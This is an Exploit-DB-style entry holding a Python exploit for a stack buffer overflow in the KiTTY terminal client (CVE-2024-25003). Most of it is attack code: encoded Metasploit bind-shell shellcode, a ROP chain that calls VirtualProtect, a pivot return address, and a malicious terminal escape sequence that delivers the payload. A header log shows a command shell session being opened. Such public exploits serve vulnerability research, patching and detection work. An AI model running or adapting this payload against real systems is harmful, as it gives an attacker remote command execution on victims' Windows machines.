KiTTY 0.76.1.13 - 'Start Duplicated Session Hostname' Buffer Overflow

EDB-ID:

51890


Author:

DEFCESCO

Type:

local


Platform:

Windows

Date:

2024-03-14


# Exploit Title: KiTTY 0.76.1.13 - 'Start Duplicated Session Hostname' Buffer Overflow
# Exploit Author: DEFCESCO (Austin A. DeFrancesco)
# Vendor Homepage: https://github.com/cyd01/KiTTY/=
# Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip
# Version: ≤ 0.76.1.13
# Tested on: Microsoft Windows 11/10/8/7/XP
# CVE: 2024-25003
#-------------------------------------------------------------------------------------#
# Blog: https://blog.DEFCESCO.io/Hell0+KiTTY
#-------------------------------------------------------------------------------------#
# msf6 payload(windows/shell_bind_tcp) > to_handler                                   #
# [*] Payload Handler Started as Job 1                                                #
# msf6 payload(windows/shell_bind_tcp) >                                              #
# [*] Started bind TCP handler against 192.168.100.28:4444                            #
# [*] Command shell session 1 opened (192.168.100.119:39315 -> 192.168.100.28:4444)   # 
#-------------------------------------------------------------------------------------#

import sys
import os
import struct

#---------------------------------------------------------------------------------------------#
# msf6 payload(windows/shell_bind_tcp) > generate -b '\x00\x07\x0a\x0d\x1b\x9c\x3A\x40' -f py #
# windows/shell_bind_tcp - 375 bytes                                                          #
# https://metasploit.com/                                                                     #
# Encoder: x86/xor_poly                                                                       #
# VERBOSE=false, LPORT=4444, RHOST=192.168.100.28,                                            #
# PrependMigrate=false, EXITFUNC=process, CreateSession=true,                                 #
# AutoVerifySession=true                                                                      #
#---------------------------------------------------------------------------------------------#

buf =  b""
buf += b"\x51\x53\x56\x57\xdb\xd9\xd9\x74\x24\xf4\x5f\x41"
buf += b"\x49\x31\xc9\x51\x59\x90\x90\x81\xe9\xae\xff\xff"
buf += b"\xff\xbe\xd4\xa1\xc4\xf4\x31\x77\x2b\x83\xef\xfc"
buf += b"\x51\x59\x90\xff\xc9\x75\xf3\x5f\x5e\x5b\x59\x28"
buf += b"\x49\x46\xf4\xd4\xa1\xa4\x7d\x31\x90\x04\x90\x5f"
buf += b"\xf1\xf4\x7f\x86\xad\x4f\xa6\xc0\x2a\xb6\xdc\xdb"
buf += b"\x16\x8e\xd2\xe5\x5e\x68\xc8\xb5\xdd\xc6\xd8\xf4"
buf += b"\x60\x0b\xf9\xd5\x66\x26\x06\x86\xf6\x4f\xa6\xc4"
buf += b"\x2a\x8e\xc8\x5f\xed\xd5\x8c\x37\xe9\xc5\x25\x85"
buf += b"\x2a\x9d\xd4\xd5\x72\x4f\xbd\xcc\x42\xfe\xbd\x5f"
buf += b"\x95\x4f\xf5\x02\x90\x3b\x58\x15\x6e\xc9\xf5\x13"
buf += b"\x99\x24\x81\x22\xa2\xb9\x0c\xef\xdc\xe0\x81\x30"
buf += b"\xf9\x4f\xac\xf0\xa0\x17\x92\x5f\xad\x8f\x7f\x8c"
buf += b"\xbd\xc5\x27\x5f\xa5\x4f\xf5\x04\x28\x80\xd0\xf0"
buf += b"\xfa\x9f\x95\x8d\xfb\x95\x0b\x34\xfe\x9b\xae\x5f"
buf += b"\xb3\x2f\x79\x89\xc9\xf7\xc6\xd4\xa1\xac\x83\xa7"
buf += b"\x93\x9b\xa0\xbc\xed\xb3\xd2\xd3\x5e\x11\x4c\x44"
buf += b"\xa0\xc4\xf4\xfd\x65\x90\xa4\xbc\x88\x44\x9f\xd4"
buf += b"\x5e\x11\x9e\xdc\xf8\x94\x16\x29\xe1\x94\xb4\x84"
buf += b"\xc9\x2e\xfb\x0b\x41\x3b\x21\x43\xc9\xc6\xf4\xc5"
buf += b"\xfd\x4d\x12\xbe\xb1\x92\xa3\xbc\x63\x1f\xc3\xb3"
buf += b"\x5e\x11\xa3\xbc\x16\x2d\xcc\x2b\x5e\x11\xa3\xbc"
buf += b"\xd5\x28\xcf\x35\x5e\x11\xa3\x43\xc9\xb1\x9a\x99"
buf += b"\xc0\x3b\x21\xbc\xc2\xa9\x90\xd4\x28\x27\xa3\x83"
buf += b"\xf6\xf5\x02\xbe\xb3\x9d\xa2\x36\x5c\xa2\x33\x90"
buf += b"\x85\xf8\xf5\xd5\x2c\x80\xd0\xc4\x67\xc4\xb0\x80"
buf += b"\xf1\x92\xa2\x82\xe7\x92\xba\x82\xf7\x97\xa2\xbc"
buf += b"\xd8\x08\xcb\x52\x5e\x11\x7d\x34\xef\x92\xb2\x2b"
buf += b"\x91\xac\xfc\x53\xbc\xa4\x0b\x01\x1a\x34\x41\x76"
buf += b"\xf7\xac\x52\x41\x1c\x59\x0b\x01\x9d\xc2\x88\xde"
buf += b"\x21\x3f\x14\xa1\xa4\x7f\xb3\xc7\xd3\xab\x9e\xd4"
buf += b"\xf2\x3b\x21"


def shellcode():
	sc = b''
	sc += b'\xBB\x44\x24\x44\x44' # mov    ebx,0x44442444
	sc += b'\xB8\x44\x44\x44\x44' # mov    eax,0x44444444
	sc += b'\x29\xD8'             # sub    eax,ebx
	sc += b'\x29\xC4'             # sub    esp,eax
	sc += buf
	sc += b'\x90' * (1052-len(sc))
	assert len(sc) == 1052 
	return sc


def create_rop_chain():

	# rop chain generated with mona.py - www.corelan.be
	rop_gadgets = [
	#[---INFO:gadgets_to_set_esi:---]
	0x004c5832,  # POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN [kitty.exe]
	0x006424a4,  # ptr to &VirtualProtect() [IAT kitty.exe]
	0x41414141,  # Filler (compensate)
	0x41414141,  # Filler (compensate)
	0x41414141,  # Filler (compensate)
	0x41414141,  # Filler (compensate)
	0x41414141,  # Filler (compensate)
	0x41414141,  # Filler (compensate)
	0x41414141,  # Filler (compensate)
	0x00484e07,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe]
	0x00473cf6,  # XCHG EAX,ESI # RETN [kitty.exe]
	#[---INFO:gadgets_to_set_ebp:---]
	0x00429953,  # POP EBP # RETN [kitty.exe]
	0x005405b0, # push esp; ret 0 [kitty.exe]
	#[---INFO:gadgets_to_set_ebx:---]
	0x0049d9f9,  # POP EBX # RETN [kitty.exe]
	0x00000201,  # 0x00000201-> ebx
	#[---INFO:gadgets_to_set_edx:---]
	0x00430dce,  # POP EDX # RETN [kitty.exe]
	0x00000040,  # 0x00000040-> edx
	#[---INFO:gadgets_to_set_ecx:---]
	0x005ac58c,  # POP ECX # RETN [kitty.exe]
	0x004d81d9,  # &Writable location [kitty.exe]
	#[---INFO:gadgets_to_set_edi:---]
	0x004fa404,  # POP EDI # RETN [kitty.exe]
	0x005a2001,  # RETN (ROP NOP) [kitty.exe]
	#[---INFO:gadgets_to_set_eax:---]
	0x004cd011,  # POP EAX # POP EBX # RETN [kitty.exe]
	0x90909090,  # nop
	0x41414141,  # Filler (compensate)
	#[---INFO:pushad:---]
	0x005dfbac,  # PUSHAD # RETN [kitty.exe]
	]
	return b''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()


#----------------------------------------------------------------------------------#
# Badchars: \x00\x07\x0a\x0d\x1b\x9c\x3A\x40                                       #
# Return Address Information: 0x0052033c : {pivot 332 / 0x14c} :                   #
#   ADD ESP,13C # POP EBX # POP ESI # POP EDI # POP EBP # RETN                     #
#   ** [kitty.exe] **   |  startnull,ascii {PAGE_EXECUTE_READWRITE}                #
# Shellcode size at ESP: 1052                                                      #
#----------------------------------------------------------------------------------#

return_address = struct.pack('<I',  0x0052033c) # ADD ESP,13C # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [kitty.exe] **   |  startnull,ascii {PAGE_EXECUTE_READWRITE}

rop_chain_padding = b'\x90' * 35 
nops = b'\x90' * 88

escape_sequence = b'\033]0;__dt:' + shellcode() + return_address
escape_sequence += rop_chain_padding + rop_chain
escape_sequence += b'\x90'
escape_sequence += b"\xE9\x2A\xFA\xFF\xFF" #jmp $eip-1490
escape_sequence += nops + b'\007'

stdout = os.fdopen(sys.stdout.fileno(), 'wb') 
stdout.write(escape_sequence)
stdout.flush()